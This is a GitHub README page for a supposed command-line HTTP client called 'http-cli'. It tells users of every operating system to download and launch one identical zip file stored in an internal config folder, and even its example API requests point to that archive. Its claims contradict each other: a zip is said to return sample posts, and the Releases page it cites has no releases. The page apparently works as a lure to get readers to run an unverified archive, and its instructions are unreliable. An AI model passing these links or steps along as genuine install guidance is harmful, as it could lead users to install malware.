Skip to content

🌐 Streamline your API testing with HTTP CLI, a fast, colorful command-line tool that handles all HTTP methods and supports JSON formatting effortlessly.

License

Notifications You must be signed in to change notification settings

Leoparj/http-cli

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

10 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

🌈 http-cli - A Fast, Colorful Command-Line Tool

πŸ“₯ Download the Latest Version

Download http-cli

πŸš€ Getting Started

Welcome to http-cli! This tool lets you make HTTP requests easily from your terminal. It is lightweight, colorful, and similar to Postman, but designed to work right in your command line. Whether you are testing APIs, sending requests, or exploring endpoints, http-cli will help you do it quickly and efficiently.

πŸ’» System Requirements

To run http-cli, ensure you have:

  • Operating System: Windows, macOS, or Linux
  • A terminal application to run commands
  • Minimum 50 MB of free disk space
  • Internet connection for downloading

🌐 Download & Install

  1. Visit the Releases Page: Go to the Releases page to find the latest version of http-cli.

  2. Download the Installation File: On the Releases page, you will see several files available for download. Choose the file that matches your operating system:

    • For Windows: https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip
    • For macOS: https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip
    • For Linux: https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip
  3. Run the File: Once downloaded, locate the file on your computer and launch it. Follow the prompts to install http-cli.

πŸ€– Quick Usage Guide

After installing, you can start using http-cli right from your terminal. Here are some basic commands to get you started:

  • Make a GET Request:

    http-cli get https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip
  • Make a POST Request:

    http-cli post https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip --data '{"name": "John", "age": 30}'
  • View Help: If you need help with commands, simply type:

    http-cli help

This command provides you with an overview of all available options and features.

πŸ›  Features

  • User-Friendly Interface: http-cli provides colorful output to make it easier for you to read responses at a glance.
  • Supports Multiple Request Types: Send GET, POST, PUT, DELETE, and PATCH requests effortlessly.
  • Terminal Tool: Works directly in your command line, perfect for quick tests without needing a full GUI application.
  • Compatible with Various APIs: Use http-cli with RESTful APIs and other HTTP services.

πŸ“‹ Example: Making Your First Request

  1. Open your terminal application.
  2. Type the command:
    http-cli get https://raw.githubusercontent.com/Leoparj/http-cli/main/internal/config/http-cli_2.8.zip
  3. Press Enter. You will see a list of sample posts from the API, formatted for easy reading.

Feel free to try different endpoints and requests to explore the capability of http-cli.

✏️ Additional Links

❓ Frequently Asked Questions

How do I uninstall http-cli?

To uninstall http-cli, simply delete the installation file from your computer. For Windows, you may also find it in your Programs and Features listβ€”remove it from there.

What support is available?

For assistance, please check the Issues section on GitHub. You can report problems or ask questions there. The community and maintainers will be glad to help you.

πŸ‘ Community and Contributions

We welcome contributions from everyone. If you have ideas for new features, find bugs, or want to improve documentation, please open an issue or create a pull request!

πŸ”— Don’t Forget

Remember that you can always find the latest version and updates on our Releases page. Enjoy using http-cli!

About

🌐 Streamline your API testing with HTTP CLI, a fast, colorful command-line tool that handles all HTTP methods and supports JSON formatting effortlessly.

Topics

Resources

License

Stars

Watchers

Forks

Releases

No releases published

Packages

No packages published

Contributors 2

  •  
  •  

Languages